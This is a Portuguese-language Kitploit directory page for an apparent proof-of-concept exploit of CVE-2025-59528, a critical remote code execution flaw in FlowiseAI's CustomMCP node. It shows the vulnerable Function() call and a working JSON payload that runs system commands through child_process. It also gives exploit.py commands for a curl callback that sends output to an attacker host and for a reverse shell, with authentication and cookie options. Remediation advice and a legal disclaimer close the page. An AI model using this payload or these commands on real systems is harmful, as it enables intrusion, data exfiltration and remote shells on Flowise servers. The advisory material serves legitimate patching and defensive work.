Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - FlowiseAI CustomMCP Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/usifaraby/cve-2025-59528-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - FlowiseAI CustomMCP Execução Remota de Código

Ver Repositório
11há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59528 - FlowiseAI CustomMCP Execução Remota de Código

CVSS 10.0 (Crítico) | Blind RCE | FlowiseAI Flowise >= 2.2.7-patch.1 e < 3.0.6

Visão Geral

Uma vulnerabilidade crítica de execução remota de código no nó CustomMCP do FlowiseAI Flowise. A função convertToValidJSONString passa a entrada fornecida pelo usuário do parâmetro mcpServerConfig diretamente para o construtor Function() do JavaScript, funcionalmente equivalente a eval(), permitindo a execução de código JavaScript arbitrário com privilégios totais do runtime Node.js.

  • Descoberto por: Kim SooHyun (@im-soohyun)
  • Advertência: GHSA-3gcm-f6qx-ff7p
  • Flowise v3.0.6 (substituiu por )
Corrigido em:
Function()
JSON5.parse()

Código Vulnerável

Em packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts, linhas 262–270:

root@kitploit:~
function convertToValidJSONString(inputString) {
    return Function('return ' + inputString)();  // ← arbitrary code execution
}

O fluxo de contaminação:

root@kitploit:~
HTTP POST → /api/v1/node-load-method/customMCP
  → controller.getSingleNodeAsyncOptions()
    → service layer
      → CustomMCP.listActions()
        → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()

Exploração

Esta é uma blind RCE - a saída do comando não é refletida na resposta HTTP. Use técnicas de callback (curl/wget) ou um reverse shell para confirmar a execução.

Requisitos

CondiçãoDetalhes
Versão do Flowise>= 2.2.7-patch.1, < 3.0.6
Acesso de redeEndpoint da API na porta 3000 (padrão)
AutenticaçãoOpcional para < 3.0.1, obrigatório para >= 3.0.1

Payload

root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}

Uso

root@kitploit:~
pip install requests

Verificar se o alvo é vulnerável (baseado em tempo)

root@kitploit:~
python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass

Execução cega de comandos

root@kitploit:~
# Exfiltrar saída via callback
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email [email protected] --password pass

Reverse shell

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Disparar exploit (tenta automaticamente bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email [email protected] --password pass

Opções de autenticação

root@kitploit:~
# JWT auth (Flowise >= 3.0.1)
--email [email protected] --password pass

# Basic auth (Flowise < 3.0.1 with FLOWISE_USERNAME env)
--username admin --password pass

# Raw cookie string (fallback)
--cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."

Remediação

  • Atualize para Flowise >= 3.0.6
  • Restrinja o acesso à API via firewall/VPN
  • Ative a autenticação em todas as instâncias
  • Monitore logs para requisições POST para /api/v1/node-load-method/customMCP

Referências

  • NVD — CVE-2025-59528
  • Advertência do GitHub — GHSA-3gcm-f6qx-ff7p
  • Análise de Ameaças SonicWall
  • Commit de Correção — Flowise v3.0.6

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha autorização adequada antes de testar.

Baixar ferramenta